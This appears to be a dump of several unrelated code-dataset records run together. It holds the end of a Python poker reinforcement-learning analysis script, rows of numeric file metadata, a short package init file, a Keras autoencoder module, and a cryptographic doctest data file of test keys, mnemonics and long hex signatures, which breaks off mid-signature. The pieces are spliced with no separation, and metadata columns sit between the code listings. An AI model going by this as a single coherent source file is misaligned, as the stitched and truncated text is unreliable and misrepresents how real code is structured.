if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
end_stack = poker.obs['stacks'][0]
winners.append(end_stack -intial_stack )
win_per_Azero = np.mean(np.array(winners))
base = base/np.sum(base) * 100
return win_per_Azero , base
def analyze_probs_AV(a , b=Agent_Simple_Rational(), pokers = None):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
if pokers is None:
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
else:
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return acts_1, pokers
def analyze_probs_fast_AV(a , b=Agent_Simple_Rational()):
try:
print(a.temp, 'atemp')
except:
pass
try:
print(b.temp, 'btemp')
except:
pass
a.epsilon = 0
b.epsilon = 0
acts_1 = np.zeros((1,7))
pokers = []
print("making pokers")
for i in range(1000):
poker = Poker_5(single_hand=True)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_1 = np.vstack([acts_1, act_get])
pokers.append(copy.deepcopy(poker))
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
acts_2 = np.zeros((1,7))
for p in pokers:
poker = copy.deepcopy(p)
while poker.game_ended == 0:
row_added=0
if poker.obs['agent_id'] == 0 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = a.action_AV(poker.obs['player0_options'], feature_engineering(obs_get))
acts_2 = np.vstack([acts_2, act_get])
break
elif poker.obs['agent_id'] == 1 and poker.hand_ended == 0:
obs_get = poker.player_obs(poker.obs['agent_id']).copy()
act_get = b.action(poker.obs['player1_options'], feature_engineering_p1(obs_get))
obs, rews, last_action = poker.step(act_get)
else:
obs, rews, last_action = poker.step(None)
if poker.hand_ended == 1:
rews=poker.rewards
row_added=1
return np.mean((acts_1 - acts_2)**2)
| 35.20979
| 103
| 0.61569
| 3,659
| 25,175
| 4.018584
| 0.046461
| 0.066377
| 0.063656
| 0.073449
| 0.971776
| 0.970552
| 0.968852
| 0.968852
| 0.965248
| 0.960691
| 0
| 0.023334
| 0.242463
| 25,175
| 715
| 104
| 35.20979
| 0.74768
| 0.090129
| 0
| 0.95
| 1
| 0
| 0.061387
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024138
| false
| 0.022414
| 0.015517
| 0
| 0.067241
| 0.041379
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3890e7f7cecb4843f52ef4d482d15119a715771
| 94
|
py
|
Python
|
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
] | 10
|
2018-11-22T03:30:39.000Z
|
2020-08-20T04:39:35.000Z
|
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
] | null | null | null |
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
] | 3
|
2019-04-09T12:17:34.000Z
|
2020-08-20T04:33:31.000Z
|
from linora.feature_selection._select import *
from linora.feature_selection._credit import *
| 31.333333
| 46
| 0.851064
| 12
| 94
| 6.333333
| 0.583333
| 0.263158
| 0.447368
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 47
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c39c6c73514fc1bec8a1c3acc81c95c621e66b3c
| 8,857
|
py
|
Python
|
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | null | null | null |
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | null | null | null |
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | 1
|
2020-10-06T10:52:16.000Z
|
2020-10-06T10:52:16.000Z
|
from keras.models import Model
from keras.layers import Input, Conv2D, Dense, MaxPooling2D, UpSampling2D
class Encoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
def get_model(self, input_tensor):
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv1')(input_tensor)
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv2')(ec_block1)
ec_block1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b1_pool')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv1')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv2')(ec_block2)
ec_block2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b2_pool')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv1')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv2')(ec_block3)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv3')(ec_block3)
ec_block3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b3_pool')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv1')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv2')(ec_block4)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv3')(ec_block4)
ec_block4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b4_pool')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv1')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv2')(ec_block5)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv3')(ec_block5)
return Model( inputs=input_tensor, outputs=ec_block5)
class Decoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
def get_model(self, input_tensor):
dc_block1 = Dense(512, activation='relu', name='dc_b1_dense1')(input_tensor)
dc_block1 = Dense(784, activation='relu', name='dc_b1_dense2')(dc_block1)
dc_block2 = Conv2D( 16, (3, 3), padding='same',
activation='relu', name='dc_b2_conv1')(dc_block1)
dc_block2 = UpSampling2D(size=(2, 2), name='dc_b2_upsample')(dc_block2)
dc_block3 = Conv2D( 32, (3, 3), padding='same',
activation='relu', name='dc_b3_conv1')(dc_block2)
dc_block3 = UpSampling2D(size=(2, 2), name='dc_b3_upsample')(dc_block3)
dc_block4 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b4_conv1')(dc_block3)
dc_block4 = UpSampling2D(size=(2, 2), name='dc_b4_upsample')(dc_block4)
dc_block5 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='dc_b5_conv1')(dc_block4)
dc_block5 = UpSampling2D(size=(2, 2), name='dc_b5_upsample')(dc_block5)
dc_block6 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b6_conv1')(dc_block5)
dc_block6 = Conv2D( 3, (3, 3), padding='same',
activation='relu', name='dc_b6_conv2')(dc_block6)
return Model( inputs=input_tensor, outputs=dc_block6)
class Autoencoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
self.layer_names = [ layer.name for layer in self.model.layers]
def get_model(self, input_tensor):
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv1')(input_tensor)
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv2')(ec_block1)
ec_block1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b1_pool')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv1')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv2')(ec_block2)
ec_block2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b2_pool')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv1')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv2')(ec_block3)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv3')(ec_block3)
ec_block3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b3_pool')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv1')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv2')(ec_block4)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv3')(ec_block4)
ec_block4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b4_pool')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv1')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv2')(ec_block5)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv3')(ec_block5)
dc_block1 = Dense(512, activation='relu', name='dc_b1_dense1')(ec_block5)
dc_block1 = Dense(784, activation='relu', name='dc_b1_dense2')(dc_block1)
dc_block2 = Conv2D( 16, (3, 3), padding='same',
activation='relu', name='dc_b2_conv1')(dc_block1)
dc_block2 = UpSampling2D(size=(2, 2), name='dc_b2_upsample')(dc_block2)
dc_block3 = Conv2D( 32, (3, 3), padding='same',
activation='relu', name='dc_b3_conv1')(dc_block2)
dc_block3 = UpSampling2D(size=(2, 2), name='dc_b3_upsample')(dc_block3)
dc_block4 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b4_conv1')(dc_block3)
dc_block4 = UpSampling2D(size=(2, 2), name='dc_b4_upsample')(dc_block4)
dc_block5 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='dc_b5_conv1')(dc_block4)
dc_block5 = UpSampling2D(size=(2, 2), name='dc_b5_upsample')(dc_block5)
dc_block6 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b6_conv1')(dc_block5)
dc_block6 = Conv2D( 3, (3, 3), padding='same',
activation='relu', name='dc_b6_conv2')(dc_block6)
return Model( inputs=input_tensor, outputs=dc_block6)
def freeze_encoder(self):
for name in self.layer_names:
if name.startswith('ec'):
self.model.get_layer( name).trainable = False
def thaw_encoder(self):
for name in self.layer_names:
if name.startswith('ec'):
self.model.get_layer( name).trainable = True
def freeze_decoder(self, freeze_list=None):
# if no list / empty list provided, freeze all decoder layers
if not freeze_list:
for name in self.layer_names:
if name.startswith('dc'):
self.model.get_layer( name).trainable = False
else:
for name in freeze_list:
self.model.get_layer( name).trainable = False
def freeze_status(self):
print('\n AE MODEL LAYER TRAINING STATUS')
for name in self.layer_names:
print(' layer %s - Trainable = %s' % (name, self.model.get_layer(name).trainable))
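# Usage sketch (illustrative): the import paths below assume standalone Keras,
# matching the layer names used above (swap to tensorflow.keras if that is what
# this file actually imports); the 224x224x3 input shape and Adam/MSE are example
# choices only. Keras only picks up `trainable` changes after a (re)compile.
from keras.layers import Input      # assumed import path
from keras.optimizers import Adam   # assumed import path

input_tensor = Input(shape=(224, 224, 3), name='ae_input')
ae = Autoencoder(input_tensor)

# Phase 1: train only the decoder.
ae.freeze_encoder()
ae.model.compile(optimizer=Adam(1e-4), loss='mse')
ae.freeze_status()

# Phase 2: unfreeze the encoder for end-to-end fine-tuning, then recompile.
ae.thaw_encoder()
ae.model.compile(optimizer=Adam(1e-5), loss='mse')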
| 49.480447
| 94
| 0.555832
| 1,111
| 8,857
| 4.170117
| 0.076508
| 0.126916
| 0.163177
| 0.106626
| 0.91539
| 0.911289
| 0.892294
| 0.88474
| 0.874811
| 0.866393
| 0
| 0.082134
| 0.301682
| 8,857
| 178
| 95
| 49.758427
| 0.666936
| 0.006661
| 0
| 0.859155
| 0
| 0
| 0.118577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014085
| null | null | 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3ace37e58af4298980e94d7c4ee67664bed5732
| 12,877
|
py
|
Python
|
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from pypurlib.pypurlib import hstr2bin, bin2hstr
def binvec2hstr(data):
return [bin2hstr(b) for b in data]
purss_test_eseed1 = bytes([0x10, 0x02, 0x00] + [0] * 48)
purss_test_eseed2 = bytes([0x10, 0x02, 0x00] + [1] * 48)
new_keys_expected = ('000000000000000000000000000000000000000000000000',
'\x83\xa9\x1aMzV\n\xbdA\xea\x95\xf4\x12\xcd\xe9\x8e\xda\x03v\x9dr\xb5u[\xb7\xc4\xabt3\xe750 ?\xa6p\xa4\xc6\xd4\xf2\xadZ\xc0\xf8\xf0\xce0\xa7', "2\xee\xe8\x08\xdc|]\xfe&\xfdHY\xb4\x15\xe5\xa7\x13\xbdv@6\xbb\xee\xfdzT\x1d\xa9\xa1\xcc{\x9f\xca\xf1}\xa09\xa6'V\xb685\xde\x17i\xe0^")
purss_pk_expected1 = '000200eb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df83191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5d'
purss_pk_expected2 = '000200eb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df83191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5d'
purss_sk_expected1 = '00000000eda313c95591a023a5b37f361c07a5753a92d3d0427459f34c7895d727d62816b3aa2224eb9d823127d4f9f8a30fd7a1a02c6483d9c0f1fd41957b9ae4dfc63a3191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5deb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df8'
purss_sk_expected2 = '00000000cd7ec7a104f01855ea39946b36fb02e9484a5fe58f6ab04f5a6420cce1c3f06bd257d174803df26ed03edd1edc8c4fdcedd39cb250426b468b028c9b1ce0ee507c0e0d17374d4dfe29afdd0b1b4aed369809351b6ba6aeffbcc7eeb6bf3aa5190c38e56c770db22b33560fb5cb6ffa992d6d8d28fa94b915a7472316018f32c6'
purss_mnemonic_eseed1 = '0002006b6c5c1c859079864060ff38e67940394bb4439fddafa6fc716731dec13a0f29ca9b9001527e8daf0851245cbf738435'
purss_mnemonic_eseed2 = '0002004493ca509e5550a50af4c5a357c041b7bb4d15f77662d0bfe04d4c2ee1eff87a0580c7bc6878c468257a977fd167378e'
purss_mnemonic_test1 = 'aback bunny honey shell brass fund lance hairy greedy villa told nearer defect row ease writer radius influx inter jacket tank beauty away oven organ abbey flick train quote magic career slope java earl'
purss_mnemonic_test2 = 'aback bunny editor digit fine tight finish finish voice galley friend agency ridge render bet kin guide aside tecum star common budget wheel patron lobe leaky helm mildew heir fridge noun worthy heart lad'
purss_sign_expected1 = '00000000d1f266ccb592d4695045c0bd5f80b66fcd4c14c0b7b98896f80cc2b0b89f3fc5088de12a087c94b16b4d7e91aa728491c559cecab3335c61d7cd2a26737932a82609b4c48e1e5f37f1b8ddcab3b48b82b2624f24bba2687a394739d5de61c3b1777f9a9be7ecafac0e440b66c961d017b1585b31e330d8c07646ba08237cf48aeb4bfead47e50ead6340c62ec4b46a83578d759aee1a5dca7b69a508cd01dfabf131eaf0b51ba9cb4b631d3bc468d5433c0dd8f0d30001aeb715e19c0c5ecb07504509a11ef692c53df4daa875e8e7b9b15f6757139172cb0e8d78b9148b60223b7fc0d5c9637872fa2d6ddc5a2442f968b6d54c0705f883f6c95b8c4c2c5648d32dc6c7ede6208139beda79c9430e7900def25fbe4a530bab94d2ef0a016f8cb0ef2f1ec92c9ea5c16984e7de26bd5bd1d36e871b18faf1ec450de9ac15453011da2507583f24d15a4fc38c6b0d68ed7ac63506bb54127185db46f4e8f6ec8a5f5f4736c889d39834c2eab1185efca3cd6815e3d00826b160a4727128ae569c61f37479cfaa25287b19269098a8d95b1c9919effcbf7dda6e933b907ec11b16230064e530270128b26b28772f3165a9e7f4fdb02a3df9edd3aa70be2781df644e3707e017a0b528245356f0028ecc81aedba1e89f68211d955094a13b61ed0582eec00120da6a37a4ef8c7926c74ee24cfe9672f869606d3cb56abef8a4a1d151218f00b1cb6d5b268fc1f90f40cc2cd8d082df91eb9111a8f183c261baa7f951b90e3c67068e12a9f3c4a2545f7fa935eaf8b69b31b2a140536fb2b309fd3eda999d7e4f6c923942e48b0bdfcaf9e766da671eb8a5bf549d3f5cb673e79f4228723a03e35caafd073d4675e818471064b0272b002fcc414274c12344d640ac0902cc172cde619172ccecb5a05c02e969e38fe13f3e03afa816df68e2112f445cf23208d3f7f02c01411cbe69de34436403d55982d1f35373002205a18fe8e23ef9a9a2c405f6c6acf270ee5ad977b69e5fc180180ffee0a09423fd132adb2f86892a723086dcdfc5e46f44284ca3b955eb1186eb9282124cee081017341d79565082f53f2ba96fbf4d20d3ff223fcc4018ff400c720735e3c4391f1652e6a488971792b04cbe8d60681e19e4577394cdec2fdd60816886e2c3b9d82c8bae31484e62f549fb5cbc46508718d8c3180567be64e453c229f673dd8eaa3621c7881a568be8c49f36c8541ba66077d4be5b9a75a1f894e1cde95a3963aeb3616cf8bc65f6bae07e11a9915db81d0a149c01b6129017951070353120bf71f22fab25609903ffd2b07726223dc4a673f5cc84b6bae6092764e1338cf68f3684eb0470c92ec8fdc13ad6701d16ce7c061346c43294e4307ccf86f08385e216f07160b0ad633bfd2cbc4b060760d97aae0e57387e1b8eb76e626b158f34ecb44965e616e3a27e2e36dc4a07cac6feeb6a2d365c01b1611a163b01d3774525deef2ff4d610fed4bf6f88a339aa272fd53db4686a88ab5dfe0ff4a595cb33fba265e8e926c3ae11eddee32fce36227cf8f2ffe2520ed711fd2bd4f9aab5808615b49fb58297636ae9a7a9e72e70d66668fca79ba451d1d9fe85a11fc4a1afac153b18a47d3d05dddc39937d27b74067501d5d4fff6322513de4d81844c479e66b68eda4c1c49f5091c2074c4244cbe4cbb11d72ca7478f5a131d50162108df5885f8a784b10cedad809b6559b8aadde1c6b9b7979402977c00adda162da0bafc35fc95d175d8ed903bcd40fb4dde7e9764ed74abb5951612df24acf800e295f161f775c0db2b00318d98e2607e84f4853063f67b486190ca76af08189bdc9eee750f7bbda30571f2d568f31785aee982892d464686bb1909700717f20d63da1bbd9e1f77ece4ce0c3a9942a4a5c34f33be6d8d05ca9d806973b75d0399e20075eec49ffd538830ec15904789e4a4465b75b3e5ce1720f694cdaff5505aee08ddf1b476837ceb221eae8fb38c42c3bbcc1752896b84eb1d5574b28ef43e11499c9154d3864a2eeb0b7b7fc09a940b4b9290ebe0e9f7b9beac9a3acdee2a1086c03f48744928fd4a49c47e1519a34171ac386acdfba882d0b72c4133ebcc495944695db788f7c713a60a8db4e02925e1c3e05b04b55162248fc7e02665b2bf80db62548bf4b152064966e18a30fa60d58507d2f8a7ba472716f83d20cfffd2e1aa48d3aacbe1407804a4b9e55cad9cec03cd98e9bd1b375db6b0c43286327adbe8f9e9c61c3357b9d89f08fd6826081ee37ab0a126a6c03c8406fea8d00eecafa3965c80a5fb9c9be56968dbbcff6fbc3d751c1558d52b1d486f7653c4da4cc7736f4ca6197ed8e05c0173bf722dd0a6bc10c472f227b53db3cd8c86ac941fe237d3b090611a0c49874c03b4004f9e549b7b5176d1d5b6704691f7dcece80e944a5bc1621aa7084701c013e17c259c8e574389df3d93ab46cc579845d513d8daf7ca2602da35de
06824894a4698ec7da593a044289a28c3cacc2f0e3fb5ae93adb27d6b77d6870c0008b0a6c2533007e1fbd7484ebb590593905a9e6befb94a77249f4fdb9313af630c1bee598ca23ca8989b4d92103fc8c5e2cfee942ade8cd0e06dc7738b99024e9d2120a741272eedf95d6242c4809fa36afd8f046addbb42ac5133e884e3dca0bc9527e9a5348069321aa7badcb31f4bffb3646fb82f2a7bccb3a09d89e82e32dadf7f289da46fd53382fe930451209aee69c147a5bde8c9a93600ed4699a0d78acea3dd754cf2049ba569b8767df72592e1b3759f47627be0ea4cac7c0022b8614e93062da73055752f376157daed9f8562b91388a5ad1a62a2c318189c0c8acaec10be88637c2ffe324319788d19f9a91edc81ed7f5bd90c38073ce0cc2d1c0eb499ffde37a188501db0e7198f364d6708cb4d9cf0b5b68091446b2992f0fb989b20fdfbd6a686113421fad8bb1b1e82c673a06f7ef4d9173c6dc6cffe4e09d94e0831065df2caea0690e7d52bd752e26f8f25bc14933daff9dcc8885273912cda790254f7def121ef957b2b918861c84d0e9b17a080c7c3812659d0702aa3e3184702e7ae6be645d70f089b1e9793f656ff9515603b5c483867acadb155ca848f1e1a4b73acbc9d4ebd2d78ce27e088d58e32a5ae39701ee1f7197a793358107631e5430b16fe3d97837bca9f3923a329835c5a3a961ee685d1394a3d55101e1919502f6f1f788b3f95700efe2e177f03e06a4e81ec4fa0183b787d'
purss_sign_expected1_h = 4
purss_sign_expected2 = '000000008fbe58a72f1849f4f4517e809d61722971da0bea954161148c2c9fc7f691061e8945b1099561c8421cd4f2add89362c52be2c575cbddb1d5252e8fd70901973cacf655e8197af20a2c0b474718d94bdc83196c4b5c864fad3c1e5fc8419cb4561ee43a4ce870ea89196d95c26b7832b543271c801f9148089c5f91d091c1723e50657bdc0448d3d025134d6dea78b463e20276ba30eb42fa38c9cc62965c1f1b4b48fe85c76cdb688f38b63e2677affe4763e092f11317d6b3d652d7330a0c964c35ab323a2ae9152783246d5c5eadc949c218248fc539f40175c91a35d79bd371a143acaa6ff76e02a86324dedb139daaebf8933bee9b2c3832e844bd3eca9cf12866253ab4269f3561b14e506164927a256b3b64f49370bc1998b47064185b9c9e63f8842df71c9e0b455105c8fe046b0b519aef2289d43c48d01d43d4078c63bad4e2670a6ed5f12e1edeabaa74b89558fb2aae583e463493c2b02cd531ca74640700fb377d4d0e1659adaeef65d299d91bb1bee85179531ec0bf2b93fb78b5d758844983c968236ca749d5319cc5dc9f6b78e7999a35232f3951a5d2032d7de35627f369d3fbdc8c5c4335dbae35c78e1845369e3ee940e452730ae6591ac86cc356b34a6a374554897b0714c84872fc42ca0b93467eae5b40b67e9c1fd9f5e33c0866d7b61d96d41ddab3ee44b5a950dbb46149bfd90e85896b177dfb384263784347d7e495e25d6d92de485c1754aa77c9ca5dac9edad186d944c697634d2de181a8627a5aa79bec12cd6c890cd27c8c7dd40f8bcbf3df0af9023e744eae768ad5b419a58f2b88492e992a2c123e2a383cdd10199327f4e2932b0b118eee046045fa568774aeac4bf01d93b29b1fe05f807f1d5240f93a22393e28a18a1e986c495f9134bec811484eb199ad46a302c9d520b892add2f181d0c8153d12b96f2e5c58d457868a22f7c39d25eb3fd58f92d9142fe96a9328398ae54c402cfdb80cd43317b57f343aa3e4cc491cc4d6dcf430562dd59b9459f8e88c18db962916bd089be0b0ea644840e4d4d7f65a30a470d4b45605a59bebb94bc0ed781956136b98538b812526afeaf0ff5e97caf13ad7a214d09d26ed075ff754ac8caf98920cb26d0a2ce78b46afec64dc18a000f8756bd66d99bba82f57aca7930b0dbb85e7cd5edd8d47249c6d4bb5df6813bebcb968efb3104b2d32e4c68838ab42f8e4c50283bb7aa064d16c5078c52831b91832d574c2fcdcb32b639a09a548a4bb0ba34961abe0324689dbc6117dd5e7570470682d33ddbb051907e5fa9d1b57cb6a27460d805776ddac79b0d8d22ca1c9642e04e9a9bcb98b1b88397c21b65a1606748d94d5bd66110f33ab2b09395e46fd538a59d405cb11e1f6e6776fdf21cc0ee34efc6f375a7534d0fd18b25044c3123b4877554edd46768aa79580c74c5c3186be2f6e79002c7e4454642fb128729f3112bb24987d91dc5e9629bb8c7612b50420445e398e0cf2502fa72a28e4053546efa81b0f32e3a9d789a94f9426bfc650f7d5e52d682c92024af033a5e6ea2a82082d11386186b2dd462927b6fb1d9ab61ac2efab772a8b6d98e394c78783c299202965b2609ebeb96ed6e36db142c1257ec31e6965470c4e0c56e1cd8569546e75f947dfcd96ea573ca86b4aa490d95d5b5bebe3298e5e9f7403d92aa5aab48b5cd6dc9a404e118d3efcd6ca0d8d92dff757b94f2ce36dd96c1ba5ca9415e9ab56bb3e9e1e2eca348ba0086356b5ddc9e9b3b399834940e822ba12e64854e026846a9fc90805b564f7e83e9a7733492f3f61cee597e4085cdb86e97fc629c487b0f8074a4e4094df7e37094b483957d2783500f657226958d5a6664eb78a8e6f1aa9ca0d2c7c28c0fc3361188292b4cd362ad7b2a4ee080ee711e67d6a180e0e0d3767f50d9f2cc8994c84a1dcf0b91d09da9201b468a3003d4f6842b65ba9c5faf776ec8becfaf023fa61944a003631d18da0044fbca055e3550631b23830b12a03bc5b621a8879919aa573b90fc712ff795521086aaa856b113782baa4bf641c29e624c2d382e04ee5087c66a27639c6bd92dd878b26df9dd064d3dead12f557772a696d50c9165ff037eb8463d84c38aa88239449a46a39a45d105967ce95c1a000937cde608b713fae3c30f1c3f2046c894a2f65239ac41f09c551e3f21d2190fa04f6ef8905260d2b8b5248ae6128b7b8536d894a79ae3758ac2f98af1768d705b66b468f2798ea2b2b68b62c9855adff2a36b54c4a3b511a5b3ee66f744112899c23a76234fec2a75856b2fa36c1ecf384f720345043532b838198e16d39726b0f11a21d7826f7b90b9c986e18be0bc482a42be922a31824613d8c9a853bb4aa9a773aa376c8fbfa02cdb1bb39adaba80e0cac48415b0df3fb2e4cdd3f4328c6715c7ce8866786964173ba6b3d52ec38f440a766de555e770cabe0a7bb7b3bb2fa80ce3ac746989e0f64fbc
